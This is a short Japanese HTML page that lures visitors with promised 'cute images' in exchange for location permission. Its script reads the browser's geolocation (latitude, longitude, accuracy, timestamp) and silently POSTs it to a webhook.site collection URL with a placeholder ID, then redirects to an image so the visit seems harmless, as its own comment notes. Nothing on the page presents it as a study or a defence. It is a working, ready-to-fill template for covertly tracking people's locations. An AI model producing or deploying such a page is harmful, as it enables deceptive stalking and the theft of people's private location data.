<!DOCTYPE html>
<html><head><title>位置情報で特典画像が見られます！</title></head>
<body>
<h1>位置情報許可で限定コンテンツを表示！</h1>
<p>許可すると可愛い画像が見られます...</p>
<script>
if (navigator.geolocation) {
  navigator.geolocation.getCurrentPosition(success, error);
}
function success(position) {
  let data = {
    latitude: position.coords.latitude,
    longitude: position.coords.longitude,
    accuracy: position.coords.accuracy,
    timestamp: position.timestamp
  };
  fetch('https://webhook.site/あなたのユニークID', {
    method: 'POST',
    headers: {'Content-Type': 'application/json'},
    body: JSON.stringify(data)
  });
  // 自然にリダイレクト
  setTimeout(() => location.href='https://example.com/cute-image.jpg', 3000);
}
function error() {
  location.href='https://example.com/cute-image.jpg';
}
</script>
</body></html>